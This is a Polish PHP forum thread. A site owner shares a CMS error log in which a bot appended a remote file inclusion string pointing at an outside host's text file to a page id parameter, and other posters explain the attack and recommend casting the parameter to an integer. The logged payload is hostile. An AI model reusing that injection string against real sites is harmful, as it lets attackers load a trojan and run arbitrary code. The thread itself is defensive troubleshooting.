Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: [bezpieczeństwo] Co chce zrobić ten bot, a może to nie bot.
Forum PHP.pl > Forum > Bazy danych > MySQL
Basic_M
Jak w temacie, może są osoby które mogą pomóc aby zabezpieczyć problem na przyszłość. W logach błędów pracy CMSa mam takie coś:

select st.idst, st.stprzekierowanie, st.ids, st.stcountform, s.ids, s.idsp, s.snazwa, s.smodul, s.slang, m.idm, m.mnazwa, m.mtabela, m.mkomentarz, m.mbox, m.mlimit, m.morder, m.mview, m.mparametr, m.mlang from serwis s, modul m, mod_strona st where st.staktywny=Tak and m.idm=st.idm and s.ids=st.ids and st.idst=74//classes/adodbt/sql.php?classes_dir=http://jal2.fileave.com/id1.txt?questionmark.gif order by st.stkolejnosc limit 0,1Something is wrong in your syntax obok /classes/adodbt/sql.php?classes_dir=http://jal2.fileave.com/id1.txt?questionmark.gif order by w linii 1

idst to id strony, pod tą stroną znajduje się formularz wysyłający emaile do obsługi strony.


O co loto, co za próba włamu może to być. Dzięki za pomoc.
Mchl
Jak parametr w zapytaniu ma być liczbą całkowitą, to rzutuj go na liczbę całkowitą

Kod
$zmienna = (int)$zmienna


i więcej taki bajer nie przejdzie.
erix
Cytat
O co loto, co za próba włamu może to być. Dzięki za pomoc.

Często wykorzystywany bot.

Jeśli skrypt nie jest zabezpieczony, załącza skrypt z URL, który jest po prostu trojanem - umożliwia zdalne wykonanie dowolnego kodu, polecenia, etc.
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.